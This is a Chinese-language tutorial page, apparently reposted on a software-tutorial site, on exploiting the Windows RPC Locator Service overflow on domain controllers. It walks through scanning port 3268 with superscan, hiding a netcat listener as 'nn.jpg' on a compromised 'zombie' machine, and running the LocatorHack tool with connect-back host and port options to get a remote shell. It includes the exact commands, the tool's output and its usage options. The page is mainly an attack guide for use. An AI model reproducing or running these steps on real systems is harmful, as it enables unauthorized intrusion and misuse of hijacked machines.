手揣网教程:绿色安全纯净官方版,体验当今速度最快的浏览器!

rpc漏洞的使用

时间:2024/4/1作者:未知来源:手揣网教程人气:

[摘要]sunx出的那个程序成功率还不错 没用过的去sunx.org下载吧 简要说一下用法(给没用过的看的) 首先拿superscan去扫3268端口,因为这是域控制器的标志 这个漏洞只对域控制器有效 扫到...

sunx出的那个程序成功率还不错 
没用过的去sunx.org下载吧 
简要说一下用法(给没用过的看的) 
首先拿superscan去扫3268端口,因为这是域控制器的标志 
这个漏洞只对域控制器有效 
扫到这样的机器以后,用nc在本地监听一个端口 
我是内网,只好在肉鸡上监听了 
下面是在肉鸡上~nn.jpg就是我放上去的nc 
218.0.0.0代表目标机 
123.123.123.123 代表开nc监听的肉鸡 
-------------- 
D:\WINNT\system32>nn.jpg -l -p 1111 
nn.jpg -l -p 1111 
---------------~~ 
然后在本地(ip不能说啊)参数大家自己查吧 
--------------- 
C:\>LocatorHack -h 218.0.0.0 -v 2 -l 2 -s 3 -r 123.123.123.123 -p 1111 
MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx 
http://www.sunx.org 
for test only, dont used to hack,  

connect socket.... 
connect smb... 
open namedpipe... 
bind rpc... 
call rpc... 
Overflowed, 218.0.0.0:1111 ------???是不是弄错? 
good luck  
------------------ 
这时候肉鸡上就出现了对方的system32目录 
usage: LocatorHack <-h Host> <-v OSVer> <-l OSLanguage> <-s OSSP> <-r connectback host> <-p connectback port> 

OS Version: 
winnt: 1 
win2k: 2 
winxp: 3 
OS Language: 
english: 1 
chinese: 2 
japanese: 3 


Exp: LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99 

-h 目标主机 
-v OS Version 2000就选2 
-l OS Language 按照上面的选择 
-s 选择所打的补丁 
-r 开nc的主机,可以是你自己也可以放在肉鸡上 
-p 用nc开的端口 
Locator Service是指向网络特有的名称映射逻辑名称的服务。此次就是在Locator Service中发现安全漏洞的。 Locator Service被捆绑于Window NT 4.0、Windows 2000和Windows XP中。不过,只有被设置成主域控制器的Windows NT 4.0和2000中,在默认条件下Locator Service才是有效的。没有设置成主域控制器的Windows NT/2000及XP则是无效的。 用superscan扫3268吧,很快就能扫到. 

网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。



关键词:rpc漏洞的运用




Copyright © 2012-2018 手揣网教程(http://www.shouchuai.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版